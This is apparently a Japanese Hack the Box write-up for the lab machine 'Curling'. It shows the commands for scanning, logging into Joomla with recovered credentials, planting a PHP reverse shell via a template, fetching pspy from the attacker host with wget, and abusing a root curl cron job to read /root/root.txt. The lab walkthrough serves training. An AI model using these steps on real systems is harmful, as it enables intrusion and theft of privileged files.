This page looks best with JavaScript enabled

【Hack the Box write-up】Curling

 ·   ·  ☕ 6 min read  ·  ✍️ さんぽし

はじめに

筆者は Hack the Box 初心者です。
何か訂正や補足、アドバイスなどありましたら、コメントか Twitter までお願いします。
さんぽし(@sanpo_shiho) | Twitter

cheat sheet

以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。
github | sanposhiho/MY_CHEAT_SHEET

machineについて

難易度は easy です。
スクリーンショット 2020-05-25 20.26.39.png

nmap

kali@kali:~$ nmap -sC -sV 10.10.10.150
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-25 02:54 EDT
Nmap scan report for 10.10.10.150
Host is up (0.26s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
|   256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_  256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.58 seconds

gobuster

kali@kali:~$ gobuster dir -u http://10.10.10.150 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 40 -x txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.150
[+] Threads:        40
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt
[+] Timeout:        10s
===============================================================
2020/05/25 04:58:48 Starting gobuster
===============================================================
/images (Status: 301)
/templates (Status: 301)
/media (Status: 301)
/modules (Status: 301)
/bin (Status: 301)
/plugins (Status: 301)
/includes (Status: 301)
/language (Status: 301)
/README.txt (Status: 200)
/components (Status: 301)
/cache (Status: 301)
/libraries (Status: 301)
/tmp (Status: 301)
/LICENSE.txt (Status: 200)
/layouts (Status: 301)
/secret.txt (Status: 200)
/administrator (Status: 301)
/htaccess.txt (Status: 200)
/cli (Status: 301)
/server-status (Status: 403)
===============================================================
2020/05/25 05:45:10 Finished                                                                                                                                                                                                               
===============================================================  

secret.txt を開くと Q3VybGluZzIwMTgh という文字列が出てきます

base64でdecode

kali@kali:~$ echo Q3VybGluZzIwMTgh | base64 -d
Curling2018!

login

/administrator から login します
Floris/Curling2018!でログインに成功します(Floris はブログ記事に名前があるので推測

スクリーンショット 2020-05-25 17.48.59.png

templateをいじる

色々見てたら template というところからサイトの php ファイルを弄れそうです

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

php ファイルを reverse-shell 用に編集します

スクリーンショット 2020-05-25 20.36.56.png

これで nc で listen しておけば reverse shell が取れます

探索

kali@kali:~$ nc -lnvp 1212
listening on [any] 1212 ...
connect to [10.10.14.32] from (UNKNOWN) [10.10.10.150] 48028
Linux curling 4.15.0-22-generic #24-Ubuntu SMP Wed May 16 12:15:17 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 10:09:12 up  3:18,  0 users,  load average: 0.04, 0.03, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ls 
ls
bin   home            lib64       opt   sbin      sys  vmlinuz
boot  initrd.img      lost+found  proc  snap      tmp  vmlinuz.old
dev   initrd.img.old  media       root  srv       usr
etc   lib             mnt         run   swap.img  var
$ whoami
whoami
www-data
$ ls -ll
ls -ll
total 12
drwxr-x--- 2 root   floris 4096 May 22  2018 admin-area
-rw-r--r-- 1 floris floris 1076 May 22  2018 password_backup
-rw-r----- 1 floris floris   33 May 22  2018 user.txt
$ cat password_backup
cat password_backup
00000000: 425a 6839 3141 5926 5359 819b bb48 0000  BZh91AY&SY...H..
00000010: 17ff fffc 41cf 05f9 5029 6176 61cc 3a34  ....A...P)ava.:4
00000020: 4edc cccc 6e11 5400 23ab 4025 f802 1960  N...n.T.#.@%...`
00000030: 2018 0ca0 0092 1c7a 8340 0000 0000 0000   ......z.@......
00000040: 0680 6988 3468 6469 89a6 d439 ea68 c800  ..i.4hdi...9.h..
00000050: 000f 51a0 0064 681a 069e a190 0000 0034  ..Q..dh........4
00000060: 6900 0781 3501 6e18 c2d7 8c98 874a 13a0  i...5.n......J..
00000070: 0868 ae19 c02a b0c1 7d79 2ec2 3c7e 9d78  .h...*..}y..<~.x
00000080: f53e 0809 f073 5654 c27a 4886 dfa2 e931  .>...sVT.zH....1
00000090: c856 921b 1221 3385 6046 a2dd c173 0d22  .V...!3.`F...s."
000000a0: b996 6ed4 0cdb 8737 6a3a 58ea 6411 5290  ..n....7j:X.d.R.
000000b0: ad6b b12f 0813 8120 8205 a5f5 2970 c503  .k./... ....)p..
000000c0: 37db ab3b e000 ef85 f439 a414 8850 1843  7..;.....9...P.C
000000d0: 8259 be50 0986 1e48 42d5 13ea 1c2a 098c  .Y.P...HB....*..
000000e0: 8a47 ab1d 20a7 5540 72ff 1772 4538 5090  .G.. .U@r..rE8P.
000000f0: 819b bb48                                ...H

なんか dump が出てきました

出てきたファイルを分析

出てきたファイルの内容を pwd_bp として手元の Kali に保存しました

kali@kali:~$ cat pwd_bp | xxd -r > pwd
kali@kali:~$ mv pwd pwd.bz2
kali@kali:~$ bzip2 -d pwd.bz2 
kali@kali:~$ ls
AutoRecon  com  Desktop  Documents  Downloads  hacking-lab  htb  idafree-7.0  impacket  mnt  Music  Pictures  Public  pwd  pwd_bp  __pycache__  SecLists  Templates  unicorn  Videos  vpn  Windows-Exploit-Suggester
kali@kali:~$ file pwd
pwd: gzip compressed data, was "password", last modified: Tue May 22 19:16:20 2018, from Unix, original size modulo 2^32 141
kali@kali:~$ mv pwd pwd.gz
kali@kali:~$ gzip -d pwd.gz 
kali@kali:~$ ls
AutoRecon  com  Desktop  Documents  Downloads  hacking-lab  htb  idafree-7.0  impacket  mnt  Music  Pictures  Public  pwd  pwd_bp  __pycache__  SecLists  Templates  unicorn  Videos  vpn  Windows-Exploit-Suggester
kali@kali:~$ file pwd
pwd: bzip2 compressed data, block size = 900k
kali@kali:~$ mv pwd pwd.bz2
kali@kali:~$ bzip2 -d pwd.bz2
kali@kali:~$ ls
AutoRecon  com  Desktop  Documents  Downloads  hacking-lab  htb  idafree-7.0  impacket  mnt  Music  Pictures  Public  pwd  pwd_bp  __pycache__  SecLists  Templates  unicorn  Videos  vpn  Windows-Exploit-Suggester
kali@kali:~$ file pwd
pwd: POSIX tar archive (GNU)
kali@kali:~$ mv pwd pwd.tar
kali@kali:~$ tar -xf pwd.tar 
kali@kali:~$ cat password.txt 
5d<wdCbdZu)|hChXll

password が出てきました

sshログイン

出てきた password でログインしてみます

kali@kali:~$ ssh floris@10.10.10.150
floris@10.10.10.150's password: 
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-22-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon May 25 10:42:18 UTC 2020

  System load:  0.0               Processes:            172
  Usage of /:   47.1% of 9.78GB   Users logged in:      0
  Memory usage: 27%               IP address for ens33: 10.10.10.150
  Swap usage:   0%


0 packages can be updated.
0 updates are security updates.


Last login: Mon May 28 17:00:48 2018 from 192.168.1.71
floris@curling:~$

これで user.txt が取れます

探索again

少し探索してみます

floris@curling:~$ ls 
admin-area  password_backup  user.txt
floris@curling:~$ cd admin-area/
floris@curling:~/admin-area$ ls
input  report
floris@curling:~/admin-area$ cat input 
url = "http://127.0.0.1"
floris@curling:~/admin-area$ cat report
(略)(index.phpぽい内容) 

pspy

sudo -lは使えませんでした。
pspy でへんな何かが実行されてないか調べます

floris@curling:~$ wget http://10.10.14.32:8000/pspy64
--2020-05-25 11:00:30--  http://10.10.14.32:8000/pspy64
Connecting to 10.10.14.32:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64                                                     100%[=======================================================================================================================================>]   2.94M   716KB/s    in 8.5s    

2020-05-25 11:00:39 (353 KB/s) - ‘pspy64’ saved [3078592/3078592]

floris@curling:~$ ls
admin-area  password_backup  pspy64  user.txt
floris@curling:~$ ./pspy64
-bash: ./pspy64: Permission denied
floris@curling:~$ chmod +x pspy64

floris@curling:~$ ./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/05/25 11:01:52 CMD: UID=0    PID=991    | /usr/lib/accountsservice/accounts-daemon 
2020/05/25 11:01:52 CMD: UID=0    PID=95     | 
2020/05/25 11:01:52 CMD: UID=0    PID=9      | 
2020/05/25 11:01:52 CMD: UID=0    PID=89     | 
2020/05/25 11:01:52 CMD: UID=0    PID=88     | 
2020/05/25 11:01:52 CMD: UID=0    PID=87     | 
2020/05/25 11:01:52 CMD: UID=0    PID=86     | 
2020/05/25 11:01:52 CMD: UID=101  PID=851    | /lib/systemd/systemd-resolved 
2020/05/25 11:01:52 CMD: UID=0    PID=85     | 
2020/05/25 11:01:52 CMD: UID=0    PID=84     | 
2020/05/25 11:01:52 CMD: UID=100  PID=822    | /lib/systemd/systemd-networkd 
2020/05/25 11:01:52 CMD: UID=0    PID=8      | 
2020/05/25 11:01:52 CMD: UID=0    PID=7      | 
2020/05/25 11:01:52 CMD: UID=62583 PID=627    | /lib/systemd/systemd-timesyncd 
2020/05/25 11:01:52 CMD: UID=0    PID=6      | 
2020/05/25 11:01:52 CMD: UID=0    PID=533    | 
2020/05/25 11:01:52 CMD: UID=0    PID=519    | 
2020/05/25 11:01:52 CMD: UID=0    PID=505    | 
2020/05/25 11:01:52 CMD: UID=0    PID=504    | 
2020/05/25 11:01:52 CMD: UID=0    PID=503    | 
2020/05/25 11:01:52 CMD: UID=0    PID=502    | 
2020/05/25 11:01:52 CMD: UID=0    PID=500    | /lib/systemd/systemd-udevd 
2020/05/25 11:01:52 CMD: UID=0    PID=496    | 
2020/05/25 11:01:52 CMD: UID=0    PID=482    | /sbin/lvmetad -f 
2020/05/25 11:01:52 CMD: UID=0    PID=480    | /lib/systemd/systemd-journald 
2020/05/25 11:01:52 CMD: UID=0    PID=471    | /usr/bin/vmtoolsd 
2020/05/25 11:01:52 CMD: UID=0    PID=42     | 
2020/05/25 11:01:52 CMD: UID=0    PID=412    | 
2020/05/25 11:01:52 CMD: UID=0    PID=411    | 
2020/05/25 11:01:52 CMD: UID=0    PID=41     | 
2020/05/25 11:01:52 CMD: UID=0    PID=4      | 
2020/05/25 11:01:52 CMD: UID=0    PID=39     | 
2020/05/25 11:01:52 CMD: UID=0    PID=37     | 
2020/05/25 11:01:52 CMD: UID=0    PID=365    | 
2020/05/25 11:01:52 CMD: UID=0    PID=36     | 
2020/05/25 11:01:52 CMD: UID=0    PID=35     | 
2020/05/25 11:01:52 CMD: UID=0    PID=34     | 
2020/05/25 11:01:52 CMD: UID=0    PID=33     | 
2020/05/25 11:01:52 CMD: UID=0    PID=32     | 
2020/05/25 11:01:52 CMD: UID=0    PID=31     | 
2020/05/25 11:01:52 CMD: UID=0    PID=30     | 
2020/05/25 11:01:52 CMD: UID=0    PID=295    | 
2020/05/25 11:01:52 CMD: UID=0    PID=293    | 
2020/05/25 11:01:52 CMD: UID=0    PID=29     | 
2020/05/25 11:01:52 CMD: UID=0    PID=288    | 
2020/05/25 11:01:52 CMD: UID=0    PID=284    | 
2020/05/25 11:01:52 CMD: UID=0    PID=28     | 
2020/05/25 11:01:52 CMD: UID=0    PID=27     | 
2020/05/25 11:01:52 CMD: UID=0    PID=264    | 
2020/05/25 11:01:52 CMD: UID=0    PID=263    | 
2020/05/25 11:01:52 CMD: UID=0    PID=262    | 
2020/05/25 11:01:52 CMD: UID=0    PID=261    | 
2020/05/25 11:01:52 CMD: UID=0    PID=260    | 
2020/05/25 11:01:52 CMD: UID=0    PID=26     | 
2020/05/25 11:01:52 CMD: UID=0    PID=259    | 
2020/05/25 11:01:52 CMD: UID=0    PID=258    | 
2020/05/25 11:01:52 CMD: UID=0    PID=257    | 
2020/05/25 11:01:52 CMD: UID=0    PID=256    | 
2020/05/25 11:01:52 CMD: UID=0    PID=255    | 
2020/05/25 11:01:52 CMD: UID=0    PID=254    | 
2020/05/25 11:01:52 CMD: UID=0    PID=253    | 
2020/05/25 11:01:52 CMD: UID=0    PID=252    | 
2020/05/25 11:01:52 CMD: UID=0    PID=251    | 
2020/05/25 11:01:52 CMD: UID=0    PID=250    | 
2020/05/25 11:01:52 CMD: UID=0    PID=25     | 
2020/05/25 11:01:52 CMD: UID=0    PID=249    | 
2020/05/25 11:01:52 CMD: UID=0    PID=248    | 
2020/05/25 11:01:52 CMD: UID=0    PID=247    | 
2020/05/25 11:01:52 CMD: UID=0    PID=246    | 
2020/05/25 11:01:52 CMD: UID=0    PID=245    | 
2020/05/25 11:01:52 CMD: UID=0    PID=244    | 
2020/05/25 11:01:52 CMD: UID=0    PID=243    | 
2020/05/25 11:01:52 CMD: UID=0    PID=242    | 
2020/05/25 11:01:52 CMD: UID=0    PID=241    | 
2020/05/25 11:01:52 CMD: UID=0    PID=240    | 
2020/05/25 11:01:52 CMD: UID=0    PID=24     | 
2020/05/25 11:01:52 CMD: UID=0    PID=239    | 
2020/05/25 11:01:52 CMD: UID=0    PID=238    | 
2020/05/25 11:01:52 CMD: UID=0    PID=237    | 
2020/05/25 11:01:52 CMD: UID=0    PID=236    | 
2020/05/25 11:01:52 CMD: UID=0    PID=235    | 
2020/05/25 11:01:52 CMD: UID=0    PID=234    | 
2020/05/25 11:01:52 CMD: UID=0    PID=233    | 
2020/05/25 11:01:52 CMD: UID=0    PID=232    | 
2020/05/25 11:01:52 CMD: UID=0    PID=231    | 
2020/05/25 11:01:52 CMD: UID=0    PID=230    | 
2020/05/25 11:01:52 CMD: UID=0    PID=23     | 
2020/05/25 11:01:52 CMD: UID=0    PID=229    | 
2020/05/25 11:01:52 CMD: UID=0    PID=228    | 
2020/05/25 11:01:52 CMD: UID=0    PID=227    | 
2020/05/25 11:01:52 CMD: UID=0    PID=226    | 
2020/05/25 11:01:52 CMD: UID=0    PID=225    | 
2020/05/25 11:01:52 CMD: UID=0    PID=224    | 
2020/05/25 11:01:52 CMD: UID=0    PID=223    | 
2020/05/25 11:01:52 CMD: UID=0    PID=222    | 
2020/05/25 11:01:52 CMD: UID=0    PID=221    | 
2020/05/25 11:01:52 CMD: UID=0    PID=220    | 
2020/05/25 11:01:52 CMD: UID=0    PID=22     | 
2020/05/25 11:01:52 CMD: UID=0    PID=219    | 
2020/05/25 11:01:52 CMD: UID=0    PID=218    | 
2020/05/25 11:01:52 CMD: UID=0    PID=217    | 
2020/05/25 11:01:52 CMD: UID=0    PID=216    | 
2020/05/25 11:01:52 CMD: UID=0    PID=215    | 
2020/05/25 11:01:52 CMD: UID=0    PID=214    | 
2020/05/25 11:01:52 CMD: UID=0    PID=213    | 
2020/05/25 11:01:52 CMD: UID=0    PID=212    | 
2020/05/25 11:01:52 CMD: UID=0    PID=211    | 
2020/05/25 11:01:52 CMD: UID=0    PID=210    | 
2020/05/25 11:01:52 CMD: UID=0    PID=21     | 
2020/05/25 11:01:52 CMD: UID=0    PID=209    | 
2020/05/25 11:01:52 CMD: UID=0    PID=208    | 
2020/05/25 11:01:52 CMD: UID=0    PID=207    | 
2020/05/25 11:01:52 CMD: UID=0    PID=206    | 
2020/05/25 11:01:52 CMD: UID=0    PID=205    | 
2020/05/25 11:01:52 CMD: UID=0    PID=20     | 
2020/05/25 11:01:52 CMD: UID=0    PID=2      | 
2020/05/25 11:01:52 CMD: UID=0    PID=19     | 
2020/05/25 11:01:52 CMD: UID=1000 PID=1890   | ./pspy64 
2020/05/25 11:01:52 CMD: UID=0    PID=1854   | 
2020/05/25 11:01:52 CMD: UID=1000 PID=1834   | -bash 
2020/05/25 11:01:52 CMD: UID=1000 PID=1826   | sshd: floris@pts/0   
2020/05/25 11:01:52 CMD: UID=0    PID=18     | 
2020/05/25 11:01:52 CMD: UID=0    PID=174    | 
2020/05/25 11:01:52 CMD: UID=0    PID=173    | 
2020/05/25 11:01:52 CMD: UID=1000 PID=1712   | (sd-pam) 
2020/05/25 11:01:52 CMD: UID=1000 PID=1705   | /lib/systemd/systemd --user 
2020/05/25 11:01:52 CMD: UID=0    PID=1701   | sshd: floris [priv]  
2020/05/25 11:01:52 CMD: UID=33   PID=1659   | /usr/sbin/apache2 -k start 
2020/05/25 11:01:52 CMD: UID=0    PID=16     | 
2020/05/25 11:01:52 CMD: UID=0    PID=15     | 
2020/05/25 11:01:52 CMD: UID=0    PID=14     | 
2020/05/25 11:01:52 CMD: UID=0    PID=139    | 
2020/05/25 11:01:52 CMD: UID=33   PID=1365   | /usr/sbin/apache2 -k start 
2020/05/25 11:01:52 CMD: UID=33   PID=1364   | /usr/sbin/apache2 -k start 
2020/05/25 11:01:52 CMD: UID=33   PID=1363   | /usr/sbin/apache2 -k start 
2020/05/25 11:01:52 CMD: UID=33   PID=1362   | /usr/sbin/apache2 -k start 
2020/05/25 11:01:52 CMD: UID=33   PID=1361   | /usr/sbin/apache2 -k start 
2020/05/25 11:01:52 CMD: UID=0    PID=1350   | /usr/sbin/apache2 -k start 
2020/05/25 11:01:52 CMD: UID=0    PID=1345   | /usr/sbin/sshd -D 
2020/05/25 11:01:52 CMD: UID=0    PID=13     | 
2020/05/25 11:01:52 CMD: UID=0    PID=1254   | /sbin/agetty -o -p -- \u --noclear tty1 linux 
2020/05/25 11:01:52 CMD: UID=0    PID=121    | 
2020/05/25 11:01:52 CMD: UID=0    PID=12     | 
2020/05/25 11:01:52 CMD: UID=0    PID=1194   | /usr/lib/policykit-1/polkitd --no-debug 
2020/05/25 11:01:52 CMD: UID=0    PID=1173   | /sbin/iscsid 
2020/05/25 11:01:52 CMD: UID=0    PID=1172   | /sbin/iscsid 
2020/05/25 11:01:52 CMD: UID=111  PID=1160   | /usr/sbin/mysqld --daemonize --pid-file=/run/mysqld/mysqld.pid 
2020/05/25 11:01:52 CMD: UID=0    PID=1148   | /usr/lib/snapd/snapd 
2020/05/25 11:01:52 CMD: UID=0    PID=1123   | /usr/bin/lxcfs /var/lib/lxcfs/ 
2020/05/25 11:01:52 CMD: UID=102  PID=1122   | /usr/sbin/rsyslogd -n 
2020/05/25 11:01:52 CMD: UID=0    PID=11     | 
2020/05/25 11:01:52 CMD: UID=103  PID=1064   | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only 
2020/05/25 11:01:52 CMD: UID=0    PID=1062   | /usr/bin/VGAuthService 
2020/05/25 11:01:52 CMD: UID=0    PID=1058   | /usr/bin/python3 /usr/bin/networkd-dispatcher 
2020/05/25 11:01:52 CMD: UID=0    PID=1049   | /usr/sbin/cron -f 
2020/05/25 11:01:52 CMD: UID=0    PID=1048   | /lib/systemd/systemd-logind 
2020/05/25 11:01:52 CMD: UID=0    PID=104    | 
2020/05/25 11:01:52 CMD: UID=0    PID=1012   | /usr/sbin/atd -f 
2020/05/25 11:01:52 CMD: UID=0    PID=1006   | /usr/sbin/irqbalance --foreground 
2020/05/25 11:01:52 CMD: UID=0    PID=10     | 
2020/05/25 11:01:52 CMD: UID=0    PID=1      | /sbin/init maybe-ubiquity 
2020/05/25 11:02:01 CMD: UID=0    PID=1911   | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report 
2020/05/25 11:02:01 CMD: UID=0    PID=1910   | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report 
2020/05/25 11:02:01 CMD: UID=0    PID=1909   | /usr/sbin/CRON -f 
2020/05/25 11:02:01 CMD: UID=0    PID=1908   | /usr/sbin/CRON -f 
2020/05/25 11:02:01 CMD: UID=0    PID=1912   | /usr/sbin/CRON -f 
2020/05/25 11:02:01 CMD: UID=0    PID=1913   | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input 
2020/05/25 11:03:01 CMD: UID=0    PID=1922   | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report 
2020/05/25 11:03:01 CMD: UID=0    PID=1921   | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input 
2020/05/25 11:03:01 CMD: UID=0    PID=1920   | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report 
2020/05/25 11:03:01 CMD: UID=0    PID=1919   | /usr/sbin/CRON -f 
2020/05/25 11:03:01 CMD: UID=0    PID=1918   | /usr/sbin/CRON -f 
2020/05/25 11:03:01 CMD: UID=0    PID=1923   | sleep 1 

注目すべきは /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report です

 -K, --config <file> Read config from a file
 -o, --output <file> Write to file instead of stdout

curl の結果が report に書き込まれてます

-K で input ファイルの内容を config として渡しているわけですねー

そこで input ファイルを local のファイルを参照するように編集します

floris@curling:~/admin-area$ echo 'url = "file:///root/root.txt"' > input

これで root.txt の内容が report に書き込まれるので root ゲットです!

終わりに

良い machine でした!

その他writeup

sudoer を書き換える方法が書いてあってこいつは天才かと思った
https://hipotermia.pw/htb/curling

Share on

さんぽし
WRITTEN BY
さんぽし
Web Developer /w Elixir, Go